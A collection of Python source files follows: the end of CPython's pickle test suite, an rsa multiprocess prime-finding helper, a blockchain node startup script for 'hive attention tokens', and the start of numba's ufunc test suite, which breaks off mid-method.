self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests:
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
class AbstractIdentityPersistentPicklerTests:
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests:
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass, *, seekable=True):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if seekable:
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if seekable:
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO, seekable=False)
def test_multiple_unpicklings_minimal(self):
# File-like object that doesn't support peek() and readinto()
# (bpo-39681)
self._check_multiple_unpicklings(MinimalIO, seekable=False)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
Such callable may be created by other persons than the ones who created the
BBB class. If passed as the state_setter item of a custom reducer, this
allows for custom state setting behavior of BBB objects. One can think of
it as the analogous of list_setitems or dict_setitems but for foreign
classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case, the callback returns an invalid result (not a 2-5
# tuple or a string), the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests:
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overridden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
@support.cpython_only
def test_reducer_override_no_reference_cycle(self):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, that could prevent all serialized objects
# from being garbage-collected without explicitly invoking gc.collect.
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
def f():
pass
wr = weakref.ref(f)
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump(f)
new_f = pickle.loads(bio.getvalue())
assert new_f == 5
del p
del f
self.assertIsNone(wr())
class AbstractDispatchTableTests:
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
parallel.py
|
import multiprocessing as mp
import rsa.prime
import rsa.randnum
def _find_prime(nbits: int, pipe) -> None:
while True:
integer = rsa.randnum.read_random_odd_int(nbits)
if rsa.prime.is_prime(integer):
pipe.send(integer)
return
def getprime(nbits: int, poolsize: int) -> int:
(pipe_recv, pipe_send) = mp.Pipe(duplex=False)
# Create processes
try:
procs = [mp.Process(target=_find_prime, args=(nbits, pipe_send))
for _ in range(poolsize)]
# Start processes
for p in procs:
p.start()
result = pipe_recv.recv()
finally:
pipe_recv.close()
pipe_send.close()
# Terminate processes
for p in procs:
p.terminate()
return result
__all__ = ['getprime']
|
run_hat.py
|
import os
from hive_attention_tokens.config import Config
from hive_attention_tokens.chain.base.blockchain import Blockchain, BlockchainState
from hive_attention_tokens.chain.base.witness import BlockSchedule
from hive_attention_tokens.chain.base.auth import HiveAccounts
from hive_attention_tokens.chain.database.setup import DbSetup
from hive_attention_tokens.chain.database.handlers import AttentionTokensDb
from hive_attention_tokens.chain.database.access import DbAccess
from hive_attention_tokens.server.serve import run_server
from threading import Thread
def run():
config = Config.config
HiveAccounts.init(BlockchainState)
db_head_block = Blockchain.has_db_blocks()
# TODO: load all accounts
if db_head_block:
BlockchainState.state_replaying()
for i in range(db_head_block[0]+1):
Blockchain.process_existing_block(i)
BlockchainState.update_cur_block(
db_head_block[0],
db_head_block[1],
db_head_block[2]
) # temp
else:
BlockchainState.state_genesis()
Blockchain.create_genesis_state()
Thread(target=BlockSchedule.block_schedule).start()
run_server(config)
if __name__ == "__main__":
run()
|
test_ufuncs.py
|
import functools
import itertools
import re
import sys
import warnings
import threading
import operator
import numpy as np
import unittest
from numba import typeof, njit
from numba.core import types, typing, utils
from numba.core.compiler import compile_isolated, Flags, DEFAULT_FLAGS
from numba.np.numpy_support import from_dtype
from numba import jit, vectorize
from numba.core.errors import LoweringError, TypingError
from numba.tests.support import TestCase, CompilationCache, MemoryLeakMixin, tag
from numba.core.typing.npydecl import supported_ufuncs, all_ufuncs
from numba.np import numpy_support
from numba.core.registry import cpu_target
from numba.core.base import BaseContext
from numba.np import ufunc_db
is32bits = tuple.__itemsize__ == 4
iswindows = sys.platform.startswith('win32')
# NOTE: to test the implementation of Numpy ufuncs, we disable rewriting
# of array expressions.
enable_pyobj_flags = Flags()
enable_pyobj_flags.enable_pyobject = True
enable_pyobj_flags.no_rewrites = True
no_pyobj_flags = Flags()
no_pyobj_flags.no_rewrites = True
enable_nrt_flags = Flags()
enable_nrt_flags.nrt = True
enable_nrt_flags.no_rewrites = True
def _unimplemented(func):
"""An 'expectedFailure' like decorator that only expects compilation errors
caused by unimplemented functions that fail in no-python mode"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
except TypingError:
raise unittest._ExpectedFailure(sys.exc_info())
raise unittest._UnexpectedSuccess
def _make_ufunc_usecase(ufunc):
ldict = {}
arg_str = ','.join(['a{0}'.format(i) for i in range(ufunc.nargs)])
func_str = 'def fn({0}):\n np.{1}({0})'.format(arg_str, ufunc.__name__)
exec(func_str, globals(), ldict)
fn = ldict['fn']
fn.__name__ = '{0}_usecase'.format(ufunc.__name__)
return fn
def _make_unary_ufunc_op_usecase(ufunc_op):
ldict = {}
exec("def fn(x):\n return {0}(x)".format(ufunc_op), globals(), ldict)
fn = ldict["fn"]
fn.__name__ = "usecase_{0}".format(hash(ufunc_op))
return fn
def _make_binary_ufunc_op_usecase(ufunc_op):
ldict = {}
exec("def fn(x,y):\n return x{0}y".format(ufunc_op), globals(), ldict)
fn = ldict["fn"]
fn.__name__ = "usecase_{0}".format(hash(ufunc_op))
return fn
def _make_inplace_ufunc_op_usecase(ufunc_op):
"""Generates a function to be compiled that performs an inplace operation
ufunc_op can be a string like '+=' or a function like operator.iadd
"""
if isinstance(ufunc_op, str):
ldict = {}
exec("def fn(x,y):\n x{0}y".format(ufunc_op), globals(), ldict)
fn = ldict["fn"]
fn.__name__ = "usecase_{0}".format(hash(ufunc_op))
else:
def inplace_op(x, y):
ufunc_op(x, y)
fn = inplace_op
return fn
def _as_dtype_value(tyargs, args):
"""Convert python values into numpy scalar objects.
"""
return [np.dtype(str(ty)).type(val) for ty, val in zip(tyargs, args)]
class BaseUFuncTest(MemoryLeakMixin):
def setUp(self):
super(BaseUFuncTest, self).setUp()
self.inputs = [
(np.uint32(0), types.uint32),
(np.uint32(1), types.uint32),
(np.int32(-1), types.int32),
(np.int32(0), types.int32),
(np.int32(1), types.int32),
(np.uint64(0), types.uint64),
(np.uint64(1), types.uint64),
(np.int64(-1), types.int64),
(np.int64(0), types.int64),
(np.int64(1), types.int64),
(np.float32(-0.5), types.float32),
(np.float32(0.0), types.float32),
(np.float32(0.5), types.float32),
(np.float64(-0.5), types.float64),
(np.float64(0.0), types.float64),
(np.float64(0.5), types.float64),
(np.array([0,1], dtype='u4'), types.Array(types.uint32, 1, 'C')),
(np.array([0,1], dtype='u8'), types.Array(types.uint64, 1, 'C')),
(np.array([-1,0,1], dtype='i4'), types.Array(types.int32, 1, 'C')),
(np.array([-1,0,1], dtype='i8'), types.Array(types.int64, 1, 'C')),
(np.array([-0.5, 0.0, 0.5], dtype='f4'), types.Array(types.float32, 1, 'C')),
(np.array([-0.5, 0.0, 0.5], dtype='f8'), types.Array(types.float64, 1, 'C')),
(np.array([0,1], dtype=np.int8), types.Array(types.int8, 1, 'C')),
(np.array([0,1], dtype=np.int16), types.Array(types.int16, 1, 'C')),
(np.array([0,1], dtype=np.uint8), types.Array(types.uint8, 1, 'C')),
(np.array([0,1], dtype=np.uint16), types.Array(types.uint16, 1, 'C')),
]
self.cache = CompilationCache()
def _determine_output_type(self, input_type, int_output_type=None,
float_output_type=None):
ty = input_type
if isinstance(ty, types.Array):
ty = ty.dtype
if ty in types.signed_domain:
if int_output_type:
output_type = types.Array(int_output_type, 1, 'C')
else:
output_type = types.Array(ty, 1, 'C')
elif ty in types.unsigned_domain:
if int_output_type:
output_type = types.Array(int_output_type, 1, 'C')
else:
output_type = types.Array(ty, 1, 'C')
else:
if float_output_type:
output_type = types.Array(float_output_type, 1, 'C')
else:
output_type = types.Array(ty, 1, 'C')
return output_type
class TestUFuncs(BaseUFuncTest, TestCase):
def basic_ufunc_test(self, ufunc, flags=no_pyobj_flags,
skip_inputs=[], additional_inputs=[],
int_output_type=None, float_output_type=None,
kinds='ifc', positive_only=False):
# Necessary to avoid some Numpy warnings being silenced, despite
# the simplefilter() call below.
self.reset_module_warnings(__name__)
pyfunc = _make_ufunc_usecase(ufunc)
inputs = list(self.inputs) + additional_inputs
for input_tuple in inputs:
input_operand = input_tuple[0]
input_type = input_tuple[1]
is_tuple = isinstance(input_operand, tuple)
if is_tuple:
args = input_operand
else:
args = (input_operand,) * ufunc.nin
if input_type in skip_inputs:
continue
if positive_only and np.any(args[0] < 0):
continue
# Some ufuncs don't allow all kinds of arguments
if (args[0].dtype.kind not in kinds):
continue
output_type = self._determine_output_type(
input_type, int_output_type, float_output_type)
input_types = (input_type,) * ufunc.nin
output_types = (output_type,) * ufunc.nout
cr = self.cache.compile(pyfunc, input_types + output_types,
flags=flags)
cfunc = cr.entry_point
if isinstance(args[0], np.ndarray):
results = [
np.zeros(args[0].size,
dtype=out_ty.dtype.name)
for out_ty in output_types
]
expected = [
np.zeros(args[0].size,
dtype=out_ty.dtype.name)
for out_ty in output_types
]
else:
results = [
np.zeros(1, dtype=out_ty.dtype.name)
for out_ty in output_types
]
expected = [
np.zeros(1, dtype=out_ty.dtype.name)
for out_ty in output_types
]
invalid_flag = False
with warnings.catch_warnings(record=True) as warnlist:
warnings.simplefilter('always')
pyfunc(*args, *expected)
warnmsg = "invalid value encountered"
for thiswarn in warnlist:
if (issubclass(thiswarn.category, RuntimeWarning)
and str(thiswarn.message).startswith(warnmsg)):
invalid_flag = True
cfunc(*args, *results)
for expected_i, result_i in zip(expected, results):
msg = '\n'.join(["ufunc '{0}' failed",
"inputs ({1}):", "{2}",
"got({3})", "{4}",
"expected ({5}):", "{6}"
]).format(ufunc.__name__,
input_type, input_operand,
output_type, result_i,
expected_i.dtype, expected_i)
try:
np.testing.assert_array_almost_equal(
expected_i, result_i,
decimal=5,
err_msg=msg)
except AssertionError:
if invalid_flag:
# Allow output to mismatch for invalid input
print("Output mismatch for invalid input",
input_tuple, result_i, expected_i)
else:
raise
def basic_int_ufunc_test(self, name=None, flags=no_pyobj_flags):
self.basic_ufunc_test(name, flags=flags,
skip_inputs=[types.float32, types.float64,
types.Array(types.float32, 1, 'C'),
types.Array(types.float64, 1, 'C')])
############################################################################
# Math operations
def test_add_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.add, flags=flags)
def test_subtract_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.subtract, flags=flags)
def test_multiply_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.multiply, flags=flags)
def test_divide_ufunc(self, flags=no_pyobj_flags):
# Bear in mind that in python3 divide IS true_divide
# so the out type for int types will be a double
int_out_type = None
int_out_type = types.float64
self.basic_ufunc_test(np.divide, flags=flags, int_output_type=int_out_type)
def test_logaddexp_ufunc(self):
self.basic_ufunc_test(np.logaddexp, kinds='f')
def test_logaddexp2_ufunc(self):
self.basic_ufunc_test(np.logaddexp2, kinds='f')
def test_true_divide_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.true_divide, flags=flags, int_output_type=types.float64)
def test_floor_divide_ufunc(self):
self.basic_ufunc_test(np.floor_divide)
def test_negative_ufunc(self, flags=no_pyobj_flags):
# NumPy ufunc has bug with uint32 as input and int64 as output,
# so skip uint32 input.
self.basic_ufunc_test(np.negative, int_output_type=types.int64,
skip_inputs=[types.Array(types.uint32, 1, 'C'), types.uint32],
flags=flags)
def test_positive_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.positive, flags=flags)
def test_power_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.power, flags=flags,
positive_only=True)
def test_gcd_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.gcd, flags=flags, kinds="iu")
def test_lcm_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.lcm, flags=flags, kinds="iu")
def test_remainder_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.remainder, flags=flags)
def test_mod_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.mod, flags=flags, kinds='ifcu',
additional_inputs = [
((np.uint64(np.iinfo(np.uint64).max), np.uint64(16)), types.uint64)
])
def test_fmod_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.fmod, flags=flags)
def test_abs_ufunc(self, flags=no_pyobj_flags, ufunc=np.abs):
self.basic_ufunc_test(ufunc, flags=flags,
additional_inputs = [
(np.uint32(np.iinfo(np.uint32).max), types.uint32),
(np.uint64(np.iinfo(np.uint64).max), types.uint64),
(np.float32(np.finfo(np.float32).min), types.float32),
(np.float64(np.finfo(np.float64).min), types.float64)
])
def test_absolute_ufunc(self, flags=no_pyobj_flags):
self.test_abs_ufunc(flags=flags, ufunc=np.absolute)
def test_fabs_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.fabs, flags=flags, kinds='f')
def test_rint_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.rint, flags=flags, kinds='cf')
def test_sign_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.sign, flags=flags)
def test_conj_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.conj, flags=flags)
def test_exp_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.exp, flags=flags, kinds='cf')
def test_exp2_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.exp2, flags=flags, kinds='cf')
def test_log_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.log, flags=flags, kinds='cf')
def test_log2_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.log2, flags=flags, kinds='cf')
def test_log10_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.log10, flags=flags, kinds='cf')
def test_expm1_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.expm1, flags=flags, kinds='cf')
def test_log1p_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.log1p, flags=flags, kinds='cf')
def test_sqrt_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.sqrt, flags=flags, kinds='cf')
def test_square_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.square, flags=flags)
def test_reciprocal_ufunc(self, flags=no_pyobj_flags):
# reciprocal for integers doesn't make much sense and is problematic
# in the case of division by zero, as an inf will overflow float to
# int conversions, which is undefined behavior.
to_skip = [types.Array(types.uint32, 1, 'C'), types.uint32,
types.Array(types.int32, 1, 'C'), types.int32,
types.Array(types.uint64, 1, 'C'), types.uint64,
types.Array(types.int64, 1, 'C'), types.int64]
self.basic_ufunc_test(np.reciprocal, skip_inputs=to_skip, flags=flags)
def test_conjugate_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.conjugate, flags=flags)
############################################################################
# Trigonometric Functions
def test_sin_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.sin, flags=flags, kinds='cf')
def test_cos_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.cos, flags=flags, kinds='cf')
def test_tan_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.tan, flags=flags, kinds='cf')
def test_arcsin_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arcsin, flags=flags, kinds='cf')
def test_arccos_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arccos, flags=flags, kinds='cf')
def test_arctan_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arctan, flags=flags, kinds='cf')
def test_arctan2_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arctan2, flags=flags, kinds='cf')
def test_hypot_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.hypot, kinds='f')
def test_sinh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.sinh, flags=flags, kinds='cf')
def test_cosh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.cosh, flags=flags, kinds='cf')
def test_tanh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.tanh, flags=flags, kinds='cf')
def test_arcsinh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arcsinh, flags=flags, kinds='cf')
def test_arccosh_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.arccosh, flags=flags, kinds='cf')
def test_arctanh_ufunc(self, flags=no_pyobj_flags):
# arctanh is only valid is only finite in the range ]-1, 1[
# This means that for any of the integer types it will produce
# conversion from infinity/-infinity to integer. That's undefined
# behavior in C, so the results may vary from implementation to
# implementation. This means that the result from the compiler
# used to compile NumPy may differ from the result generated by
# llvm. Skipping the integer types in this test avoids failed
# tests because of this.
to_skip = [types.Array(types.uint32, 1, 'C'), types.uint32,
types.Array(types.int32, 1, 'C'), types.int32,
types.Array(types.uint64, 1, 'C'), types.uint64,
types.Array(types.int64, 1, 'C'), types.int64]
self.basic_ufunc_test(np.arctanh, skip_inputs=to_skip, flags=flags,
kinds='cf')
def test_deg2rad_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.deg2rad, flags=flags, kinds='f')
def test_rad2deg_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.rad2deg, flags=flags, kinds='f')
def test_degrees_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.degrees, flags=flags, kinds='f')
def test_radians_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.radians, flags=flags, kinds='f')
############################################################################
# Bit-twiddling Functions
def test_bitwise_and_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.bitwise_and, flags=flags)
def test_bitwise_or_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.bitwise_or, flags=flags)
def test_bitwise_xor_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.bitwise_xor, flags=flags)
def test_invert_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.invert, flags=flags)
def test_bitwise_not_ufunc(self, flags=no_pyobj_flags):
self.basic_int_ufunc_test(np.bitwise_not, flags=flags)
# Note: there is no entry for left_shift and right_shift as this harness
# is not valid for them. This is so because left_shift and right
# shift implementation in NumPy has undefined behavior (in C-parlance)
# when the second argument is a negative (or bigger than the number
# of bits) value.
# Also, right_shift for negative first arguments also relies on
# implementation defined behavior, although numba warantees "sane"
# behavior (arithmetic shifts on signed integers, logic shifts on
# unsigned integers).
############################################################################
# Comparison functions
def test_greater_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.greater, flags=flags)
def test_greater_equal_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.greater_equal, flags=flags)
def test_less_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.less, flags=flags)
def test_less_equal_ufunc(self, flags=no_pyobj_flags):
